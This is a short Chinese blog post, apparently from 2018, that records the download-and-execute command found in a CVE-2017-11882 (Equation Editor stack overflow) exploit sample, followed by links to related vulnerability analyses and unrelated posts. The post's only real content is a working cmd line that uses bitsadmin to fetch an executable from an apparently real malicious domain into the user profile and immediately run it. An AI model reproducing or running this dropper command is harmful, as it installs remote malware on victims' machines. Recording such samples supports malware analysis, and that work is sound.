文档章节

cmd bat 下载并运行文件,来自cve-11882漏洞样本,eqnedit32.exe栈溢出

simpower
 simpower
发布于 2018/08/15 13:11
字数 56
阅读 15
收藏 0

cmd.exe /c bitsadmin /transfer eH /priority foreground http://holdthatpaper33.com/abu_output774B940.exe %USERPROFILE%\cXUAQSZZXXCXzx.exe && start %USERPROFILE%\cXUAQSZZXXCXzx.exe

© 著作权归作者所有

共有 人打赏支持
simpower
粉丝 26
博文 583
码字总数 45012
作品 0
海淀
程序员
私信 提问
Office漏洞袭来(CVE-2018-0802)详细分析

  在windows2017年 11月份发布补丁,修复了包括cve-2017-11882在内之后,在2018年又继续发布补丁,修复了包括CVE-2018-0802在内的多个漏洞,而这次CVE-2018-0802再一次利用了EQNEDT32.EXE公...

FreeBuf
2018/01/23
0
0
Office公式编辑器漏洞二代的原理分析、利用与防护方案

  在上周二(2018年1月9日)的微软例行更新中,微软再一次对Office中的公式编辑器3.0产生的多个内存破坏漏洞进行了修补,并将这一系列漏洞归类于编号CVE-2018-0802。   漏洞披露后,金睛安...

FreeBuf
2018/01/20
0
0
一个二进制POC的诞生之旅CVE-2018-0802

  *本文作者:GeekOnline,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。   背景   在潜伏17年的“噩梦公式”漏洞(CVE-2017-11882)被曝光修补之后,之前的漏洞程序EQNEDT32.EXE在w...

FreeBuf
2018/01/22
0
0
样本分析 | CVE-2017-11882、CVE-2018-0802漏洞组合远控木马

封面 前言 看到腾讯电脑管家在freebuf上发了一篇《NDAY漏洞CVE-2017-11882与0Day漏洞CVE-2018-0802漏洞组合传播远控木马的样本分析》,觉得这个样本很有学习意义。就根据这个样本,梳理了下相...

皆明
2018/01/27
0
0
cve-0158,0199,8759,11882,11935

0158栈溢出 0199远程地址自动下载执行 8759 属于代码注入,虽然可以像0199一样利用,但是跟office无关,跟.net有关 CVE8759,该漏洞在.net库中的SOAP WSDL 解析模块IsValidUrl函数没有正确处...

simpower
2018/08/03
0
0

没有更多内容

加载失败,请刷新页面

加载更多

深度学习为图片人物换装【python代码教程】

在观看本文之前,请答应我要善良。昨天预告了下,发现很多同学对这个模型都表示出兴趣,甚至有好多同学后台发来照片让我帮他们脱裤子。授人以鱼不如授人以渔,请这些同学好自为之~ 01效果演示...

阿里云官方博客
28分钟前
3
0
centos7安装RabbitMQ详细过程

由于RabbitMQ是基于Erlang语言开发,所以在安装RabbitMQ之前,需要先安装Erlang 1、环境: centos 7.1 内核版本3.10.0-229.el7.x86_64 Erlang 19.0.4版本 RabbitMQ 3.6.14版本 2、在线安装E...

秋至丶枫以落
59分钟前
1
0
6个使用KeePassX保护密码的技巧

虽然安全是个深奥的主题,但是你可以遵循几个简单的日常习惯来减小攻击面。本文将解释确保密码信息安全的重要性,并给出如何充分利用KeePassX的建议。 日益互联的数字世界使安全成为一个重要...

Linux就该这么学
今天
1
0
UnsatisfiedLinkError sawindbg.dll

方法:搜索sawindbg.dll,然后将文件报错的目录下

洛水
今天
5
0
说说不知道的Golang中参数传递

本文由云+社区发表 导言 几乎每一个C++开发人员,都被面试过有关于函数参数是值传递还是引用传递的问题,其实不止于C++,任何一个语言中,我们都需要关心函数在参数传递时的行为。在golang中...

腾讯云加社区
今天
5
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部